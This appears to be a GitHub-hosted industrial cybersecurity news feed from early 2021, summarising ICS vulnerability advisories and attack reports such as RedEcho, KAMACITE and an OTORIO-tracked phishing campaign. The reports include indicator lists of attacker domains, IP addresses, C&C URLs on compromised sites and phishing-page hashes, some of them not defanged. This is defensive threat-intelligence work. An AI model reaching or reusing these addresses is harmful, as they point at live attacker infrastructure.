View on GitHub

CyberICS.github.io

News and publication on cybersecurity in industry

Industrial cybersecurity news


[VULNERABILITY] Rockwell Automation 1734-AENTR Series B and Series C

04/03/2021

Vulnerability affects :
-  1734-AENTR Series B, Versions 4.001 to 4.005, and 5.011 to 5.017
-  1734-AENTR Series C, Versions 6.011 and 6.012

Vulnerability risks:
- unauthorized data modification

Update are available
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Schneider Electric EcoStruxure Building Operation (EBO)

04/03/2021

Vulnerability affects :
- WebReports v1.9 - v3.1
- WebStation v2.0 - v3.1
- Enterprise Server installer v1.9 - v3.1
- Enterprise Central installer v2.0 - v3.1

Vulnerability risks:
- unauthorized file uploads
- command execution by a remote use


See the documents below for more information
Sources :
CVE :

[ATTACK] Phishing and information theft campaign targeting many industries

04/03/2021

A new phshing campaign with the aim of stealing information is underway in different parts of the world using AZORult malware.
The targets that have been targeted are :
- Oil and gas supply chain industries and international maritime organizations in the Middle East.
- A supplier of commercial refrigerators, a supplier of heavy electrical engineering equipment, a manufacturer of optical components and a provider of intelligent automation solutions in Europe
- An industrial process and factory automation company, a manufacturer of building materials and a transportation services company in Asia
- A U.S. manufacturer of non-slip covers
- An aerospace company in India
- A development company in South Korea
- A service provider to the oil and gas industry in the UAE
- A logistics and transport company in the UAE
- The national oil and gas company of Sri Lanka
- An oil and gas company in China
- Petrochemical and textile companies in China

IOCs are available in the sources.
Sources :

[VULNERABILITY] Hitachi ABB Power Grids Ellipse EAM

02/03/2021

Vulnerability affects :
- Ellipse EAM versions prior to and including 9.0.25

Vulnerability risks:
- hijack a user’s session
- compromise authentication credentials

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Rockwell Automation CompactLogix 5370 and ControlLogix 5570 Controllers

02/03/2021

Vulnerability affects :
- Armor Compact GuardLogix 5370 controllers, Versions 33 and prior
- Armor GuardLogix, Safety Controllers, Versions 33 and prior
- CompactLogix 5370 L1 controllers, Versions 33 and prior
- CompactLogix 5370 L2 controllers, Versions 33 and prior
- CompactLogix 5370 L3 controllers, Versions 33 and prior
- Compact GuardLogix 5370 controllers, Versions 33 and prior
- ControlLogix 5570 controllers, Versions 33 and prior

Vulnerability risks:
- DoS

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] MB connect line mbCONNECT24, mymbCONNECT24

02/03/2021

Vulnerability affects :
- mymbCONNECT24 v2.6.1 and prior
- mbCONNECT24 v2.6.1 and prior

Vulnerability risks:
- RCE

See the documents below for more information
Sources :
CVE :

[RESSOURCES] TTPs about KAMACITE group

01/03/2021

Dragos today released a series of TTPs on the KAMACITE attacking group.
Network :
- Use of third party servers compromised with IPs (little use of domain name)
- Use of phishing (Dragos quotes Ukrainian political and financial topics and conferences)
- Password reuse (especially in the latest campaigns in the USA)

Dragos attributes the following events to KAMACITE:
- Blackenergy2 (2014)
- Blackenergy3 (2015)
- Intrusion for the ELECTRUM group (leading to CRASHOVERRIDE) (2016)
- Intrusion into the German power grid (2017)
- Intrusion into the US electrical sector (2019-2020)

Source : https://www.dragos.com/blog/industry-news/new-ics-threat-activity-group-kamacite/

More information is available here : 
> https://malpedia.caad.fkie.fraunhofer.de/actor/greyenergy
> https://malpedia.caad.fkie.fraunhofer.de/actor/sandworm
> https://malpedia.caad.fkie.fraunhofer.de/actor/electrum

[ATTACK] Chinese hacker group targets India’s power infrastructure

01/03/2021

This report reports on a campaign by a Chinese attacking group (according to Recorded Future) targeting the Indian electricity sector. 
Ten organizations close to the electricity sector were targeted and the name Recorded Future gave to the group behind the campaign is RedEcho.

- IOC :
ntpc-co.com
websencl.com
ptciocl.com
ubuntumax.com
www.shipcardonlinehelp.com
www.smartdevoe.com
www.astudycarsceu.net
www.indiasunsung.com
ixrails.com
pandorarve.com
indrails.com
escanavupdate.club
railway.sytes.net
modibest.sytes.net
indrra.ddns.net
indianrailway.hopto.org
inraja.ddns.net
railways.hopto.org
101.78.177.227
101.78.177.252
210.92.18.132
218.255.77.52
223.255.151.74
223.255.155.231
223.255.155.235
223.255.155.238
27.255.94.29
27.255.94.21
27.255.92.83
223.255.151.85
101.78.177.242
218.255.77.40
218.255.77.54
223.255.155.243
180.150.226.216
223.255.155.247
223.255.155.252
223.255.155.237
218.255.77.60
Sources :

[VULNERABILITY] PerFact OpenVPN-Client

25/02/2021

Vulnerability affects :
- OpenVPN-Client, Versions 1.4.1.0 and prior

Vulnerability risks:
- remote code execution through a malicious webpage
- Privilege escalation

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Fatek FvDesigner

25/02/2021

Vulnerability affects :
- FvDesigner Version 1.5.76 and prior

Vulnerability risks:
- read/modify information
- execute arbitrary
- crash the application

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Rockwell Automation Logix Controllers

25/02/2021

Vulnerability affects :
Rockwell software are affected:
- RSLogix 5000: Versions 16 through 20
- Studio 5000 Logix Designer: Versions 21 and later

Logix Controllers :
- CompactLogix 1768
- CompactLogix 1769
- CompactLogix 5370
- CompactLogix 5380
- CompactLogix 5480
- ControlLogix 5550
- ControlLogix 5560
- ControlLogix 5570
- ControlLogix 5580
- DriveLogix 5560
- DriveLogix 5730
- DriveLogix 1794-L34
- Compact GuardLogix 5370
- Compact GuardLogix 5380
- GuardLogix 5570
- GuardLogix 5580
- SoftLogix 5800

Vulnerability risks:
- bypass the verification mechanism

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] ProSoft Technology ICX35

25/02/2021

Vulnerability affects :
- ICX35-HWC-A: Versions 1.9.62 and prior
- ICX35-HWC-E: Versions 1.9.62 and prior

Vulnerability risks:
- Change the current user’s password
- Alter device configurations

See the documents below for more information
Sources :
CVE :

[RESSOURCES] Dragos 2020 ICS report

24/02/2020

Here is the report on industrial cybersecurity in 2020 made by the company Dragos. To summarize the 45 pages:
- Dragos has identified 4 new groups targeting ICS (STIBNITE, TALONITE, KAMACITE, VANADINITE)
- Abuse of legitimate accounts is the primary source of threat
- 64% of the security advisories published on ICS in 2020 did not have a patch
- The reuse of third party libraries in ICS has created two important vulnerabilities : Ripple20 and AMNESIA33
- Dragos also looks back at the EKANS ransomware that has touched Honda, Enel and Fresenius Kabi
- The report also refers to the PARISITE and MAGNALLIUM groups, which target devices at the edge of ICS environments (VPN, RDP).
- 33% of the published security advisories did not have a valid CVSS score.

Source : https://hub.dragos.com/hubfs/Year-in-Review/Dragos_2020_ICS_Cybersecurity_Year_In_Review.pdf

[VULNERABILITY] Advantech BB-ESWGP506-2SFP-T

24/02/2021

Vulnerability affects :
- BB-ESWGP506-2SFP-T industrial ethernet switches: Versions 1.01.09 and prior

Vulnerability risks:
-  execute arbitrary code (Hard-coded Credentials)

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Advantech Spectre RT Industrial Routers

24/02/2021

Vulnerability affects :
- Spectre RT ERT351 firmware Versions 5.1.3 and prior

Vulnerability risks:
- information disclosure
- deletion of files
- remote code execution

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Rockwell Automation FactoryTalk Services Platform

24/02/2021

Vulnerability affects :
- FactoryTalk Services Platform Versions 6.10.00 and 6.11.00

Vulnerability risks:
- A remote and unauthenticated attacker to create new users in the FactoryTalk Services Platform administration console

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Mitsubishi Electric FA engineering software products

18/02/2021

Vulnerability affects :
  - C Controller module setting and monitoring tool, all versions
  - CPU Module Logging Configuration Tool, all versions
  - CW Configurator, all versions
  - Data Transfer, all versions
  - EZSocket, all versions
  - FR Configurator, all versions
  - FR Configurator SW3, all versions
  - FR Configurator2, all versions
  - GT Designer3 Version1(GOT1000), all versions
  - GT Designer3 Version1(GOT2000), all versions
  - GT SoftGOT1000 Version3, all versions
  - GT SoftGOT2000 Version1, all versions
  - GX Configurator-DP, Versions 7.14Q and prior
  - GX Configurator-QP, all versions
  - GX Developer, all versions
  - GX Explorer, all versions
  - GX IEC Developer, all versions
  - GX LogViewer, all versions
  - GX RemoteService-I, all versions
  - GX Works2, Versions 1.597X and prior
  - GX Works3, Versions 1.070Y and prior
  - M_CommDTM-HART, all versions
  - M_CommDTM-IO-Link, all versions
  - MELFA-Works, all versions
  - MELSEC WinCPU Setting Utility, all versions
  - MELSOFT EM Software Development Kit (EM Configurator), all versions
  - MELSOFT Navigator, all versions
  - MH11 SettingTool Version2, all versions
  - MI Configurator, all versions
  - MT Works2, all versions
  - MX Component, all versions
  - Network Interface Board CC IE Control utility, all versions
  - Network Interface Board CC IE Field Utility, all versions
  - Network Interface Board CC-Link Ver.2 Utility, all versions
  - Network Interface Board MNETH utility, all versions
  - PX Developer, all versions
  - RT ToolBox2, all versions
  - RT ToolBox3, all versions
  - Setting/monitoring tools for the C Controller module, all versions
  - SLMP Data Collector, all versions

Vulnerability risks:
- denial-of-service condition

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Johnson Controls Metasys Reporting Engine (MRE) Web Services

18/02/2021

Vulnerability affects :
- Metasys Reporting Engine (MRE) Web Services – v2.0
- Metasys Reporting Engine (MRE) Web Services – v2.1

Vulnerability risks:
- remote unauthenticated attacker to access and download arbitrary files from the system

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Multiple vulnerability in Moxa product

18/02/2021

Vulnerability affects :
  - UC-2100 Series 	Moxa Industrial Linux v1.0
  - UC-2100-W Series 	Moxa Industrial Linux v1.0
  - UC-3100 Series 	Moxa Industrial Linux v1.0
  - UC-5100 Series 	Moxa Industrial Linux v1.0
  - UC-8100 Series 	Moxa Industrial Linux v1.0
  - UC-8100A-ME-T Series 	Moxa Industrial Linux v1.0
  - UC-8100-ME-T Series 	Debian 8.x
  - UC-8100-ME-T Series 	Moxa Industrial Linux v1.0
  - UC-8200 Series 	Moxa Industrial Linux v1.0
  - UC-8410A Series 	Debian 8.x
  - UC-8410A Series 	Moxa Industrial Linux v1.0
  - UC-8540 Series 	Debian 8.x
  - UC-8580 Series 	Moxa Industrial Linux v1.0
  - MC-1100 Series 	Debian 8.x
  - MC-1100 Series 	Debian 9.x
  - MC-1200 Series 	Debian 9.x
  - V2201 Series 	Debian 9.x
  - V2403 Series 	Debian 9.x
  - V2406A Series 	Debian 8.x
  - V2406C Series 	Debian 7.x
  - V2416A Series 	Debian 9.x
  - V2426A Series 	Debian 7.x
  - V2616A Series 	Debian 7.x
  - DA-681C Series 	Debian 7.x
  - DA-681A Series 	Debian 9.x
  - DA-682C Series 	Debian 8.x
  - DA-720 Series 	Debian 9.x
  - DA-820C Series 	Debian 8.x
  - MPC-2070 Series 	Debian 9.x
  - MPC-2101 Series 	Debian 9.x
  - MPC-2120 Series 	Debian 9.x
  - MPC-2121 Series 	Debian 9.x
  - ioThinx 4530 Series 	Firmware Edition 1.3 or lower


Vulnerability risks:
- Privilege escalation

See the documents below for more information
Sources :
CVE :

[RESSOURCES] Identification of vulnerabilities on IIoT equipment

17/02/2021

FireEye has published two research papers on vulnerabilities in ConnectPort X2e devices. These devices are used in residential solar installations.
These articles explain how FireEye researchers discovered these vulnerabilities.


Source : https://www.fireeye.com/blog/threat-research/2021/02/solarcity-exploitation-of-x2e-iot-device-part-one.html
Source : https://www.fireeye.com/blog/threat-research/2021/02/solarcity-exploitation-of-x2e-iot-device-part-two.html


[VULNERABILITY] Rockwell Automation Allen-Bradley Micrologix 1100

16/02/2021

Vulnerability affects :
- Allen-Bradley MicroLogix 1100 revision number 1.0

Vulnerability risks:
- DoS condition

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Open Design Alliance Drawings SDK

16/02/2021

Vulnerability affects :
- Drawings SDK: All versions prior to 2021.12 (Version 2021.11 is only affected by CVE-2021-25174 and CVE-2021-25173)

Vulnerability risks:
- Code execution
- DoS condition

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Hamilton-T1

16/02/2021

Vulnerability affects :
-  Hamilton-T1 Ventilator Versions 2.2.3 and prior

Vulnerability risks:
- obtain sensitive information / crash the device (physical action is required) with hard-coded credentials and Missing XML Validation

See the documents below for more information
Sources :
CVE :

[RESSOURCES] FireEye analyzes the TriStation protocol with reverse lookup on TRITON malware

16/02/2021

FireEye has published a research paper on the proprietary TriStation protocol used during the TRITON attack (https://www.cyberark.com/resources/threat-research-blog/anatomy-of-the-triton-malware-attack).
The article details how the complex TriStation protocol works from the TRITON malware.
It explains how the attackers used an old DLL named "tr1com40.dll" to interface with PLCs, but also the limits of reverse engineering. 

Source : https://www.fireeye.com/blog/threat-research/2018/06/totally-tubular-treatise-on-triton-and-tristation.html

[VULNERABILITY] Rockwell Automation DriveTools SP and Drives AOP

11/02/2021

Vulnerability affects :
    - DriveTools SP v5.13 and below
      - DriveExecutive v5.13 and below
    - Drives AOP v4.12 and below (supports Logix Versions v16-v30)


Vulnerability risks:
- privilege escalation
- total loss of device confidentiality, integrity, and availability

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Multiple Embedded TCP/IP stacks

11/02/2021

Vulnerability affects :
  - spoof TCP connections
  - cause denial-of-service conditions
  - inject malicious data
  - bypass authentication

Vulnerability risks:
    - Nut/Net, Version 5.1 and prior
    - CycloneTCP, Version 1.9.6 and prior
    - NDKTCPIP, Version 2.25 and prior
    - FNET, Version 4.6.3
    - uIP-Contiki-OS (end-of-life [EOL]), Version 3.0 and prior
    - uC/TCP-IP (EOL), Version 3.6.0 and prior
    - uIP-Contiki-NG, Version 4.5 and prior
    - uIP (EOL), Version 1.0 and prior
    - picoTCP-NG, Version 1.7.0 and prior
    - picoTCP (EOL), Version 1.7.0 and prior
    - MPLAB Net, Version 3.6.1 and prior
    - Nucleus NET, All versions prior to Version 5.2
    - Nucleus ReadyStart for ARM, MIPS, and PPC, All versions prior to Version 2012.12

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] GE Digital HMI/SCADA iFIX

10/02/2021

Vulnerability affects :
- HMI/SCADA iFIX: Versions 6.1 and prior

Vulnerability risks:
- could allow an attacker to escalate their privileges

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Advantech iView

10/02/2021

Vulnerability affects :
- iView versions prior to v5.7.03.6112

Vulnerability risks:
- may allow an attacker to disclose information, escalate privileges to Administrator, perform an arbitrary file read, and remotely execute commands

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Siemens SINEMA Server & SINEC NMS

10/02/2021

Vulnerability affects :
- SINEC NMS: All versions prior to v1.0 SP1 Update 1
- SINEMA Server: All versions prior to v14.0 SP2 Update 2


Vulnerability risks:
- allow arbitrary code execution on an affected system

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Siemens RUGGEDCOM ROX II

10/02/2021

Vulnerability affects :
- RUGGEDCOM ROX MX5000: All versions prior to v2.14.0
- RUGGEDCOM ROX RX1400: All versions prior to v2.14.0
- RUGGEDCOM ROX RX1500: All versions prior to v2.14.0
- RUGGEDCOM ROX RX1501: All versions prior to v2.14.0
- RUGGEDCOM ROX RX1510: All versions prior to v2.14.0
- RUGGEDCOM ROX RX1511: All versions prior to v2.14.0
- RUGGEDCOM ROX RX1512: All versions prior to v2.14.0
- RUGGEDCOM ROX RX500: All versions prior to v2.14.0


Vulnerability risks:
- allow the decryption of encrypted content, possible code execution, or cause a system crash, resulting in a denial-of-service condition

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Siemens TIA Administrator

10/02/2021

Vulnerability affects :
- PCS neo (Administration Console): v3.0
- TIA Portal: v15, v15.1, and v16

Vulnerability risks:
- allow local users to escalate privileges and execute code as a local SYSTEM user

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Siemens JT2Go and Teamcenter Visualization

10/02/2021

Vulnerability affects :
- JT2Go: All versions prior to v13.1.0.1
- Teamcenter Visualization: All versions prior to v13.1.0.1

Vulnerability risks:
- Arbitrary code execution

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Siemens SCALANCE W780 and W740

10/02/2021

Vulnerability affects :
- SCALANCE W780 and W740 (IEEE 802.11n) family: All versions prior to v6.3

Vulnerability risks:
- denial-of-service condition

See the documents below for more information
Sources :
  • [EN]
CVE :

[VULNERABILITY] Siemens SIMARIS configuration

10/02/2021

Vulnerability affects :
- SIMARIS configuration: All versions

Vulnerability risks:
- gain persistence or escalate privileges within the system

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] SIMATIC WinCC Graphics Designer

10/02/2021

Vulnerability affects :
- WinCC Graphics Designer used with the following DCS and SCADA products:
    - SIMATIC PCS 7: All versions
    - SIMATIC WinCC: All versions prior to 7.5 SP2

Vulnerability risks:
- unauthenticated access to protected files

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Siemens DIGSI 4

10/02/2021

Vulnerability affects :
- DIGSI 4: All versions prior to v4.94 SP1 HF 1

Vulnerability risks:
- execute arbitrary code with SYSTEM privileges

See the documents below for more information
Sources :
CVE :

[ATTACK] Attack on Florida’s Watter Treatment System

10/02/2021

The attacker changed the level of sodium hydroxide in the water treatment plant of the town of Oldsmar.
According to the town sheriff, the attacker used TeamViewer.
Sources :

[VULNERABILITY] Luxion KeyShot

04/02/2021

Vulnerability affects :
- Luxion software
  - KeyShot versions prior to 10.1
  - KeyShot Viewer versions prior to 10.1
  - KeyShot Network Rendering versions prior to 10.1
  - KeyVR versions prior to 10.1


Vulnerability risks:
- arbitrary code execution
- the storing of arbitrary scripts into automatic startup folders

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Horner Automation Cscape

04/02/2021

Vulnerability affects :
- Cscape: All versions prior to 9.90 SP3.5

Vulnerability risks:
- Code execution in the context of the current process

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Hirschmann RSP, RSPE, and OS2 series HSR denial of service vulnerability

03/02/2021

Vulnerability affects :
- Hirschmann HiOS RSP, RSPE, OS2 :
  - 07.0.04 –07.1.00
  - 08.0.00 –08.3.xx

Vulnerability risks:
- denial of service

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Rockwell Automation MicroLogix 1400

02/02/2021

Vulnerability affects :
- MicroLogix 1400, All series Version 21.6 and below

Vulnerability risks:
- denial-of-service

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Siemens SIMATIC HMI Comfort Panels & SIMATIC HMI KTP Mobile Panels

02/02/2021

Vulnerability affects :
- SIMATIC HMI Comfort Panel (including SIPLUS variants): All versions before v16 Update 3a
- SIMATIC HMI KTP Mobile Panels: All versions before v16 Update 3a

Vulnerability risks:
-  remote attacker gain full access to the device(s) if the Telnet service is enabled

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] ABB AC500V2 Webserver denial of service vulnerability

02/02/2021

Vulnerability affects :
- The following AC500 V2 products with onboard ethernet are affected :
  - PM554
  - PM556
  - PM564
  - PM566
  - PM572
  - PM573

Vulnerability risks:
- denial of service (see below)

See the documents below for more information
Sources :
CVE :

[ATTACK] SunBurst in industrial environment

27/01/2021

On December 13, 2020, several organizations published the Orion IT software supply chain analysis. According to Kaspersky, 32.4% of impacted companies are in the industry. The statistics :

Truesec has cited a list of potential victims, here is the one related to the industry (source: TrueSec) :

Decoded Internal Name Possible Organization (may be inaccurate)* Observed Message First Seen
resprod.com Res Group (Renewable energy company) 2nd stage 2020-05-06
te.nz TE Connectivity (Sensor manufacturer) 2nd stage 2020-05-13
fisherbartoninc.com The Fisher Barton Group (Blade Manufacturer) 2nd stage 2020-05-15
ironform.com Ironform (metal fabrication) 2nd stage 2020-06-19
mixonhill.com Mixon Hill (intelligent transportation systems) Terminate 2020-04-29
bisco.int Bisco International (Adhesives and tapes) Unknown 2020-04-30
helixwater.org Helix Water District N/A N/A

Source :


[VULNERABILITY] Fuji Electric Tellus Lite V-Simulator and V-Server Lite

26/01/2021

Vulnerability affects :
- Tellus Lite V-Simulator: Versions prior to v4.0.10.0
- V-Server Lite: Versions prior to v4.0.10.0

Vulnerability risks:
- Execute code under the privileges

Patch available :
See the documents below for more information
Sources :
CVE :

[ATTACK] Hacking of a GTC system in Mexico

26/01/2021

A group of Iranian attackers hacked a GTC system of the University of Autónoma de Ciudad Juárez with a web interface. 

[ATTACK] Email phishing targeting industries

26/01/2021

A phishing campaign targeting different industries has been revealed by the Israeli company OTORIO. The most targeted sectors are construction and energy. The phishing emails, mostly imitating Xerox scan notifications, contained an HTML file as an attachment. This HTML file contained a blurred image and a pop-up imitating the Office365 style asking for a password. The javascript in the HTML page performs a POST request to the attackers’ servers. OTORIO also made the link with previous phishing campaigns dating back to May 2020 using the same javascript code obfuscation and HTML files. The names of the files distributed by the attacker use the following pattern : scanXEROX-{IP}-{UPPERCASE_STRING_OF_CHARACTERS_SIZE_7}-{IP}.HTM

Répartition des cibles par secteurs :

TTP provided by OTORIO :

Distribution of victims by country (Source : CyberICS) :

During the analysis, an alias comes up several times : bobychenko This alias comes back in these rules Yara of August 2018 concerning a phishing attempt : https://github.com/Hestat/lw-yara/blob/master/includes/linkedin-phish001.yar

This alias also returns as an author in malicious Word documents scanned on hybrid analysis :

Some technical features are worth noting (Source: CyberICS):

The domains associated with this campaign with IPs in DNS :

Domains IP 1 IP 2 IP 3  
quantityscape.xyz 185.212.129.131      
sendlivofse.xyz 45.88.3.86      
urentr.xyz 185.212.128.132      
shlivemicrosft.xyz 45.88.3.86      
vintageredwe.xyz 45.88.3.70      
weworkhard.xyz 172.67.214.31 104.31.93.46 104.31.92.46  
zixzanwe.xyz 45.88.3.70      
mtietw.xyz 185.212.128.62      
justgoturwork.xyz 172.67.211.250 104.24.117.51 104.24.116.51  
froffisse.xyz 45.88.3.37      

The domains present in IOCs are hosted on an IP that has been used as a C&C for malware distribution. For example the IP 185.212.129.131 was used for the quantityscape[.]xyz domain and according to Virustotal for malware distribution as MSIL/Kryptik.WLD!tr, Trojan.TR/AD.LokiBot.inpgy. No evidence could be found linking the phishing campaign to the spread of these malwares.

The IPs involved come mainly from AS 200313 established in Les Sechelles.

List of used registrar :

CyberICS IOCs :

gfbcqot[.]xyz
emraanrajput[.]net
sahatyah[.]shop

Other suspect domains (Source : CyberICS) :

facturasshigeurl.site	
ns1.ionlineforyou.xyz	
ns2.ionlineforyou.xyz 	
serv.ionlineforyou.xyz
office365working.xyz

OTORIO IOCs C&C domains registered by the attacker

aauths[.]xyz
asklogzswq[.]xyz
bdqopt[.]xyz
drakovexlogz[.]xyz
hrekre[.]xyz
ionlineforyou[.]xyz
itsthebestasajob[.]xyz
khetwexw[.]xyz
livestrde28[.]xyz
loggsofice[.]xyz
manonwork[.]xyz
officeautonow[.]xyz
officednslogsonline[.]xyz
quantityscape[.]xyz
redirectitto[.]xyz
rhbreeef[.]xyz
sendlivofse[.]xyz
shlivemicrosft[.]xyz
synchoilas[.]xyz
urentr[.]xyz
vintageredwe[.]xyz
wegoforyou[.]xyz
weworkhard[.]xyz
workingoni[.]xyz
zixzanwe[.]xyz
mtietw[.]xyz
justgoturwork[.]xyz
froffisse[.]xyz

Recent C&C pages on compromised servers

http://corp.uber24[.]ru/php/go.php
https://aparthotelgeres[.]pt/wp-content/plugins/1/post.php
https://expendiatus[.]xyz/post.php
https://ifultech[.]com/1/post.php
https://www.aascarrierinc[.]com/wp-includes/SimplePie/Decode/HTML/rest.php
https://silverstream-london[.]com/1/post.php
https://actorsstudio.com[.]np/wp-admin/includes/1/post.php
http://365itsos.com[.]au/wp-admin/includes/rent.php
https://www.skyblue-network[.]com/wp-includes/images/go.php
https://www.kayakingfloridakeys[.]com/wp-admin/rent.php
https://easimedic[.]com/1/post.php
https://www.aascarrierinc[.]com/wp-includes/SimplePie/Decode/HTML/rest.php

HTML Phishing pages SHA-1:

e76eb571068c195444d0e23cbdc35fba19a95e0c
9fc656e03703994d5f144457d020db5b06469abc
79d4464c7325feb38a02726b049d6cce3d747627
44c05f4b2bb0787a9c2fcf7c36e1dab457fbe370
c1ec15c712c29dcac08660fddb0da71e94b3d04a
4933bd2fa4c9a3ea30ac479a738ebcdfb488044f
d098f6473f2f6bfd8e3f2f14dd56adc969e76725
a8e817fa63fe2c5bf0273f63f2267b61ce89de72
37713a64ffd1b126f8a4809e94faf9cd72538974
53c4ccab781d93eb04ff5bcfc01321c11958816c
4f309c3a8d754a3fcdfed611e4f101e6b690ddd5
cccf673f3c9c02f5f9a21346cdc91f78d94c92b3
2ac423a86d94d82cc0ecc3c508aa7a90c27a4b9c

[VULNERABILITY] WAGO M&M Software fdtCONTAINER

22/01/2021

Vulnerability affects :
- fdtCONTAINER component
    - Versions between 3.5.0 and 3.5.20304.x
    - Versions between 3.6.0 and 3.6.20304.x
    - Versions older than 3.5
- fdtCONTAINER application
    - Versions between 4.5.0 and 4.5.20304.x
    - Versions between 4.6.0 and 4.6.20304.x
    - Versions older than 4.5
- dtmINSPECTOR Version 3 (Based on FDT 1.2.x)
- Emerson Rosemount Transmitter Interface Software (RTIS) SKUs: 04088-9000-0001, 4088-9000-0002, and 7000003-312
- PEPPERL+FUCHS PACTware 5.0, up to and including Version 5.0.5.31

Vulnerability risks:
- user into loading a manipulated project file
- malicious code can be executed without notice

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Mitsubishi Electric MELFA

22/01/2021

Vulnerability affects :
- MELFA robot controllers :
    - MELFA FR Series
        - RV-#FR$%\-D-@ CR800-#V$D
        - RH-#FRH$&\-D-@ CR800-#HD
        - RH-#FRHR$&\-D-@ CR800-#HRD
        - RV-#FR$%\-R-@ R16RTCPU + CR800-#V$R
        - RH-#FRH$&\-R-@ R16RTCPU + CR800-#HR
        - RH-#FRHR$&\-R-@ R16RTCPU + CR800-#HRR
        - RV-#FR$%\-Q-@ Q172DSRCPU + CR800-#V$Q
        - RH-#FRH$&\-Q-@ Q172DSRCPU + CR800-#HQ
        - RH-#FRHR$&\-Q-@ Q172DSRCPU + CR800-#HRQ
    - MELFA CR Series
        - RV-8CRL-D-@ CR800-CVD
        - RH-#CRH$&-D-@ CR800-CHD
    - MELFA ASSISTA: RV-5AS-D-@ CR800-05VD

Vulnerability risks:
- denial-of-service condition

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Honeywell OPC UA Tunneller

22/01/2021

Vulnerability affects :
- OPC UA Tunneller: All versions prior to 6.3.0.8233

Vulnerability risks:
- disclose sensitive information
- remotely execute arbitrary code
- crash the device

Patch available
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Delta Electronics TPEditor

22/01/2021

Vulnerability affects :
- TPEditor: v1.98 and prior

Vulnerability risks:
- execute code under the privileges of the application

Patch available :
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Delta Electronics ISPSoft

22/01/2020

Vulnerability affects :
- ISPSoft: v3.12 and prior

Vulnerability risks:
- execute code under the privileges of the application

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] ABB - AC500 V2

20/01/2021

Vulnerability affects :
- All AC500 V2 products with onboard ethernet

Vulnerability risks:
- Stop the PLC

Patch available :
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Philips Interventional Workstations

20/01/2021

Vulnerability affects :
-  Haswell workstations labeled with 12NC identification numbers (4598 009 39471, 4598 009 39481, 4598 009 70861, 4598 009 98531) with :
   - Interventional Workspot (Release 1.3.2, 1.4.0, 1.4.1, 1.4.3, 1.4.5)
   - Coronary Tools/Dynamic Coronary Roadmap/Stentboost Live (Release 1.0)
   - ViewForum (Release 6.3V1L10)

Vulnerability risks:
- remotely shut down or restart the workstation

Patch available :
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Dnsmasq

20/01/2021

Vulnerability affects :
- Dnsmasq DNS and DHCP server for version 2.8.2 and prior

Vulnerability risks:
- cache poisoning
- remote code execution
- denial-of-service 

Patch available :
See the documents below for more information
Sources :
CVE :

20/01/2021

Vulnerability affects :
- RLC-4XX series
- RLC-5XX series
- RLN-X10 series

Vulnerability risks:
- unauthorized access to sensitive information

Patch available :
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] DNSpooq - Dnsmasq Vulnerabilities in SCALANCE and RUGGEDCOM Devices

19/01/2021

Vulnerability affects :
- RUGGEDCOM RM1224 : All versions
- SCALANCE M-800 : All versions
- SCALANCE S615 : All versions
- SCALANCE SC-600 : All versions
- SCALANCE W1750D : All versions

Vulnerability risks:
- Vulnerabilities impact the validation of DNS

Patch available :
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] SOOIL Dana Diabecare RS Products

16/01/2021

Vulnerability affects :
- Dana Diabecare RS: All versions prior to 3.0
- AnyDana-i: All versions prior to 3.0
- AnyDana-A: All versions prior to 3.0

Vulnerability risks:
- access sensitive information
- modify therapy settings
- bypass authentication
- crash the device being accessed

These vulnerabilities could affect patient safety
Patch available :
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Schneider Electric EcoStruxure Power Build-Rapsody

16/01/2021

Vulnerability affects :
- EcoStruxure Power Build - Rapsody software Versions 2.1.13 and prior

Vulnerability risks:
- allow a local attacker to upload a malicious SSD file
- resulting in a use-after-free condition or a stack-based buffer overflow

Patch available :
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Siemens SCALANCE X Switches

16/01/2021

Vulnerability affects :
- SCALANCE X-200 switch family (incl. SIPLUS NET variants): All versions
- SCALANCE X-200IRT switch family (incl. SIPLUS NET variants): All versions
- SCALANCE X-300 switch family (incl. X408 and SIPLUS NET variants): All versions prior to v4.1.0

Patch available :
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Siemens JT2Go and Teamcenter Visualization

16/01/2021

Vulnerability affects :
- JT2Go: All versions prior to v13.1.0
- JT2Go: Version 13.1.0. only affected by CVE-2020-26989, CVE-2020-26990, CVE-2020-26991
- Teamcenter Visualization: All versions prior to V13.1.0
- Teamcenter Visualization: Version 13.1.0 only affected by CVE-2020-26989, CVE-2020-26990, CVE-2020-26991

Vulnerability risks:
- Type Confusion
- Improper Restriction of XML External Entity Reference
-  Out-of-bounds Write
-  Heap-based Buffer Overflow
